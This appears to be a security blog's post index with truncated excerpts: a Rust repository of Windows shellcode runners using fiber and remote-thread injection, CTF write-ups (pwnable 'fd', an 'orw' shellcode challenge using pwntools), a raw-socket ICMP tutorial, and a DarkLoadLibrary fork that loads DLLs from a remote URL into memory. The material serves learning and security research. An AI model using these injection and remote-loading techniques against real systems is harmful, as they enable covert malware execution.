Posts

I made a repository of Windows Shellcode runners: rust-shellcode. Here are some introductions: rust-shellcode asm create_fiber create_remote_thread create_remote_thread_native create_thread create_thread_native etwp_create_etw_thread nt_queue_apc_thread_ex_local rtl_create_user_thread asm shellcode execute locally. link shellcode to .text section inline asm using asm! macro call shellcode create_fiber shellcode execute locally. convert current thread to fiber using ConvertThreadToFiber alloc memory using VirtualAlloc copy shellcode to allocated memory using std::ptr::copy create a fiber using CreateFiber jump shellcode using SwitchToFiber jump back create_remote_thread shellcode execute remotely....

Toddler’s Bottle fd This game WriteUp is writen after I pass. And, this game is very easy. connect server with user and password ls -l Check if something under folder. I found these: cat fd.c Check the source code. Program verify if command line arguments count more or equal two. If not, program will puts a hint. Continue, program convert argv[1] from ASCII to number, and use the number minus 0x1234....

Linux raw socket的总结 介绍相关结构体和常量, 最后实现ICMP接收和响应 创建套接字 int sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); 创建一个IPV4 ICMP原始套接字(IPV4 ICMP raw socket) AF_INET: 代表IPV4协议 SOCK_RAW: 代表原始套接字 IPPROTO_ICMP: 代表ICMP协议 禁用内核自动附加IP头 int on = 1; setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); 启用IP_HDRINCL选项, 数据包含IP数据头, 发送数据时需要自己构建IP数据头, 内核不再生成 接收数据 char* buf = calloc(1, IPPROTO_MAX); struct sockaddr in; socklen_t in_len = sizeof(in); recvfrom(sock, buf, IPPROTO_MAX, 0, &in, &in_len); 将数据写入buf, 发送方地址将保存在in变量 解析数据段 struct iphdr *ip = (struct iphdr*)buf; struct icmphdr *icmp = (struct icmphdr*)((char*)ip + 4 * ip->ihl); printf("data: %s\n", (char*)icmp + 8); iphdr是ip header的缩写, 表示一个IP数据头结构 IHL(Internet Header Length): IP数据头是不定长的, 所以需要IHL记录IP数据头大小, 以4字节为单位, 所以IP数据头大小等于4 * IHL bytes...

SharkLoadLibrary 是 DarkLoadLibrary 的完整版 在DarkLoadLibrary中的darkloadlibrary.h文件中, 作者定义了一组宏, 用于Control Flags #define LOAD_LOCAL_FILE 0x00000001 #define LOAD_REMOTE_FILE 0x00000002 #define LOAD_MEMORY 0x00000003 #define NO_LINK 0x00010000 可以看到, 作者早就定义好了LOAD_REMOTE_FILE的宏, 只不过在公开项目时删除了相关功能我将功能完善了, 开源在github供大家使用: SharkLoadLibrary 以下是项目介绍: LoadLibrary for Children’s Paradise. :sailboat: Folk From DarkLoadLibrary and thanks. Feature New feature: LOAD_REMOTE_FILE Usage PDARKMODULE DarkModule = DarkLoadLibrary( LOAD_REMOTE_FILE, // control flags "http://xxxx/demo.dll", // remote dll url, if loading from remote NULL, // dll buffer to load from if loading from memory 0, // dll size if loading from memory "Demo" // dll name if loaded from memory and remote ); Build && Test Environmental requirements libcurl Install from vcpkg: ....

题目提示: Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. checksec: [*] '/home/kkkk/code/orw' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 看一下伪代码: int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); ((void (*)(void))shellcode)(); return 0; } 读取0xc8个字节, 然后转换为函数指针执行 这道题只需要构建一个open read write的shellcode就可以了 可以用pwntools自动完成 from pwn import * context(os="linux", arch="i386", log_level="debug") r = remote("chall....